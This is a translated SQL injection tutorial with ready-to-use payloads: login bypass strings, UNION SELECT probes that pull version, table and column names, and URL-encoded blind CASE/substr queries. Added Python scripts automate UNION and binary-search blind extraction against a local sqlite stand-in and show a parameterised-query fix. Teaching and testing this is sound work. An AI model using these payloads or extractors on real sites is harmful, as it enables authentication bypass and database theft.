Translation: Database Injection Technology

Source: Internet
Author: User
Tags: sql injection, commands

www.2cto.com: original PDF (with pictures): http://up.2cto.com/2012/1120/20121120122511460.rar

SQL injection is a basic attack technique by which an attacker obtains sensitive information from a web application by way of its database, and it is still the most common application-layer attack today. By injecting SQL commands into user input, the attacker makes the application's queries bypass a check, alter a result, or directly execute database commands. Take the login form of a typical site: for each login attempt it runs a simple query of the form

Select * from users where username = 'admin' and password = 'admin123'

If the attacker knows that the administrator account is admin, he can log in without a password by entering admin'-- as the user name. The statement then becomes

Select * from users where username = 'admin'-- ' and password = 'admin123'

Everything after the comment marker -- is ignored, so the statement actually executed is equivalent to

Select * from users where username = 'admin'

and the password check is bypassed.

SQL injection comes in three modes: in-band, out-of-band, and inferential (blind).

In-band. Injection points are easy to find with google. Open a page of the site and simply append a single quotation mark to the URL:

http://192.168.2.3/news-and-events.php?id=22'

The page shows the error "Error in your SQL syntax". The quotation mark was carried into the back-end query and broke it, so the returned error confirms that the parameter is an injection point. If single quotes are filtered, append or 1=1-- or and 1=1-- to the URL instead:

http://192.168.2.3/news-and-events.php?id=22 or 1=1--
http://192.168.2.3/news-and-events.php?id=22 and 1=1--

Because the added condition is always true, the page returns its normal content. (Note that or 1=1 matches every row, so the page may show a different article; the and 1=1 / and 1=0 pair gives the cleaner comparison.)
Now append and 1=0-- instead:

http://192.168.2.3/news-and-events.php?id=22 and 1=0--

The page comes back abnormal (empty or with an error), because and 1=0 makes the WHERE clause always false. Appending or 1=0 does not change the result, since or with a false term leaves the original condition in force; the useful pair is and 1=1 against and 1=0. Other always-true conditions such as or 'a'='a', and other comment markers such as #, --, and /*, can be combined the same way when testing for an injection point.

The next step uses UNION SELECT to pull out database information.

Find the DBMS. Each database has functions of its own that identify its type (MS SQL, MySQL, Oracle):

MS SQL: user_name()
MySQL: user()
Oracle: select user from dual

For example (the union probes below assume the seven-column count established in the next step):

http://192.168.2.3/news-and-events.php?id=-22 union select 1,user_name(),3,4,5,6,7

returns the error "Function user_name doesn't exist", so the back end is not MS SQL. Try user():

http://192.168.2.3/news-and-events.php?id=-22 union select 1,user(),3,4,5,6,7

This returns the database user name, so the DBMS is MySQL, and we can go on to pull out sensitive information.

Find the number of columns. Append a UNION with a single NULL:

http://192.168.2.3/news-and-events.php?id=22 union select NULL

The page reports that the SELECT statements have a different number of columns, so the original query selects more than one column; keep appending NULLs (union select NULL,NULL and so on) until the error disappears. Simpler is order by:

http://192.168.2.3/news-and-events.php?id=22 order by 7--

Raise the number until the page errors; the largest value that still works is the column count (here 7). Then use

http://192.168.2.3/news-and-events.php?id=-22 union select 1,2,3,4,5,6,7

Note the minus sign before 22: it makes the site's own query return no row, so the page renders the row from our UNION instead, and the numbers that appear on the page (here 2, 3, 5 and 7) mark the columns that are displayed. Put the database version and name into displayed columns:

http://192.168.2.3/news-and-events.php?id=-22 union select 1,@@version,database(),4,5,6,7
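The in-band steps above (the login bypass, the true/false probe, counting columns with UNION SELECT NULL, and reading data out through a UNION with a negative id) as a runnable illustration, added here and not part of the original article. An in-memory sqlite3 database stands in for the target's MySQL server, so sqlite_version() and sqlite_master play the roles of @@version and information_schema; the users and news tables, their rows, and the news query are constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the target's database (sqlite3 instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'admin123');
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO news VALUES (22, 'Annual report', 'Report text', 'editor');
    """)
    return conn


def login_vulnerable(conn, username, password):
    # The login query built by string concatenation, as in the article's example.
    sql = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username, password):
    # Parameterised query: the values never become part of the SQL text, so
    # admin'-- is looked up as a literal user name and simply does not exist.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def news_vulnerable(conn, id_param):
    # The ?id= parameter pasted straight into the query, like news-and-events.php on the target.
    sql = f"SELECT title, body, author FROM news WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def find_column_count(query, max_cols=20):
    # Append UNION SELECT NULL, then NULL,NULL, ... until the DBMS stops
    # complaining that the two SELECTs have different numbers of columns.
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            query(f"22 UNION SELECT {nulls} --")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_extract(query, expressions, n_cols):
    # Negative id: the site's own SELECT matches nothing, so the only row
    # rendered is ours. Columns default to the markers 1,2,3,... as in the
    # article; `expressions` maps a 1-based column position to the SQL to read.
    cols = [str(i) for i in range(1, n_cols + 1)]
    for pos, expr in expressions.items():
        cols[pos - 1] = expr
    rows = query(f"-22 UNION SELECT {', '.join(cols)} --")
    return rows[0]


if __name__ == "__main__":
    conn = build_db()
    print("bypass works on vulnerable login:", login_vulnerable(conn, "admin'--", "wrong"))
    print("bypass blocked by parameterised login:", not login_fixed(conn, "admin'--", "wrong"))
    q = lambda param: news_vulnerable(conn, param)
    n = find_column_count(q)
    print("columns:", n)
    print(union_extract(q, {
        1: "sqlite_version()",
        2: "(SELECT group_concat(name) FROM sqlite_master WHERE type = 'table')",
    }, n))
```

Run it as a script to see the bypass, the column count and the extracted version and table list. The hardened login shows the fix the article does not spell out: once the values travel as parameters, the comment trick has nothing to comment out.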
The echoed values show that the version is 5.0 and the database name is nilakantatrust.

Get the table names. List the tables in the nilakantatrust database through information_schema:

http://192.168.2.3/news-and-events.php?id=-22 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--

With all table names displayed, list the column names the same way:

http://192.168.2.3/news-and-events.php?id=-22 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--

This throws out every column name in the nilakantatrust database, and the attacker looks for names such as password, SSN, creditcard number, user and so on.

Out-of-band. This mode uses two different communication channels between the attacker and the application. A modern DBMS does far more than return data to users: it can be instructed to send e-mail and it can talk to the file system, and all of these features are useful to an attacker. The attacker injects the malicious string through one channel (the application's input) and the DBMS answers through a new channel, for example an e-mail, a file written to disk, or the output of a command run through xp_cmdshell.

Inferential (blind) injection. Here the server returns no error or other telltale information, which is what is usually meant by blind injection. When the server receives an attack it sends no data back to the attacker; the attacker has to phrase SQL conditions that are either true or false and read the answer from how the application reacts. This makes injection harder, but not impossible. Let's practise:

http://192.168.2.3/news-and-events.php?id=22 and 1=1--

returns the same page as the original site, while
http://192.168.2.3/news-and-events.php?id=22 and 1=0-- returns a changed (error) page, exactly as in the in-band case.

Check the database type. Test whether the application accepts MS SQL syntax:

http://192.168.2.3/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user_name())%20then%200%20else%201%20end)--

Decoded, that is:

http://192.168.2.3/news-and-events.php?id=21+(select case when (select user_name()) then 0 else 1 end)--

%2b is + and %20 is a space: this is URL encoding, and when particular characters are filtered, alternative encodings can be used to get past the filter. The idea is to add a value computed by the CASE expression to the id 21. The page for id 21 looks different from the page for id 22, so the result of the arithmetic can be read off from which page comes back. If the function exists, the CASE is evaluated (on MySQL a string in a boolean context counts as 0, so the else branch adds 1) and the page for id=22 is returned; if the function does not exist, the query fails and the id=22 page does not appear (the article describes this case as the CASE adding 0, which leaves id=21). The page did not show id 22 for user_name(), so the DBMS is not MS SQL. Try MySQL's user():

http://192.168.2.3/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user())%20then%200%20else%201%20end)--

This returns the id=22 page, so the database is MySQL. Now use MySQL's substring function to read the version:

http://192.168.2.3/news-and-events.php?id=22%20and%20substr(@@version,1,1)=5--

If the version begins with '5', substr returns '5' (we extract only one character), the comparison is true, and the normal page is shown, which confirms a 5.xx version.
If that URL does not give the normal page, compare against 4 or 3 instead. To learn more about the version, move on to the following digits of the version string, for example substr(@@version,3,1)=0 against substr(@@version,3,1)=1.

Query the database user name. Combine CASE with substring:

http://192.168.2.3/news-and-events.php?id=22%2b%20(select%20case%20when%20(substr(user(),1,1)='A')%20then%200%20else%201%20end)--

Decoded:

http://192.168.2.3/news-and-events.php?id=22+(select case when (substr(user(),1,1)='A') then 0 else 1 end)--

Read the application's response and vary the character compared in substr. Once the first letter of the user name is known, move on to the second and third:

substr(user(),2,1)='R'
substr(user(),3,1)='B'

Done this way, finding a single character of the user name can take a couple of hundred requests, one for each candidate ASCII value. The technique can be optimised so that each character costs at most 8 requests: compare the character's ASCII code against the midpoint of the remaining range (ascii(substr(user(),1,1))>64 and so on) and halve the range with each answer, a binary search. Seven comparisons cover the 7-bit ASCII range and an eighth request confirms the result.
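The blind extraction described above as an added example, not code from the original article: a simulated boolean oracle over an in-memory sqlite3 database stands in for the target page, and the character-by-character linear search is compared with the binary search over the character code. sqlite3's unicode() and length() replace MySQL's ascii() and length(); the news and users tables and the admin row are constructed for the example.

```python
import sqlite3

PRINTABLE = range(32, 127)   # candidate character codes: printable ASCII


def build_db():
    """Constructed stand-in for the target (sqlite3 instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (21, 'Older item'), (22, 'Annual report');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'admin123');
    """)
    return conn


class BlindOracle:
    """Simulates news-and-events.php?id=22 AND <condition>--: True when the
    normal id=22 page comes back, False when it does not. Counts requests."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        sql = f"SELECT title FROM news WHERE id = 22 AND ({condition}) --"
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.OperationalError:
            return False        # a broken probe shows an error page, not the article


def extract_char_linear(oracle, expr, pos):
    # The article's first approach: one request per candidate character.
    # Comparing the code (unicode() here, ascii() in MySQL) avoids having to
    # quote characters such as the single quote inside the injected SQL.
    for code in PRINTABLE:
        if oracle.ask(f"unicode(substr({expr}, {pos}, 1)) = {code}"):
            return chr(code)
    return None


def extract_char_binary(oracle, expr, pos):
    # The optimisation: binary search on the character code. 95 printable
    # codes need at most 7 "greater than" probes; an eighth request confirms
    # the result so a character outside the range is reported as unknown
    # instead of being silently mis-read as the range boundary.
    lo, hi = PRINTABLE[0], PRINTABLE[-1]
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo) if oracle.ask(f"unicode(substr({expr}, {pos}, 1)) = {lo}") else None


def extract_string(oracle, expr, extract_char):
    # Position by position until the string is exhausted.
    out = []
    pos = 1
    while oracle.ask(f"length({expr}) >= {pos}"):
        ch = extract_char(oracle, expr, pos)
        if ch is None:
            break
        out.append(ch)
        pos += 1
    return "".join(out)


if __name__ == "__main__":
    conn = build_db()
    secret = "(SELECT password FROM users WHERE username = 'admin')"
    for name, method in (("linear", extract_char_linear), ("binary", extract_char_binary)):
        oracle = BlindOracle(conn)
        value = extract_string(oracle, secret, method)
        print(f"{name}: {value!r} in {oracle.requests} requests")
```

Against a real target the oracle's ask() would issue the HTTP request and compare the response with the known id=22 page; everything else stays the same. The request counter makes the cost difference concrete: the linear search spends several hundred requests on an eight-character secret, the binary search well under a hundred.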
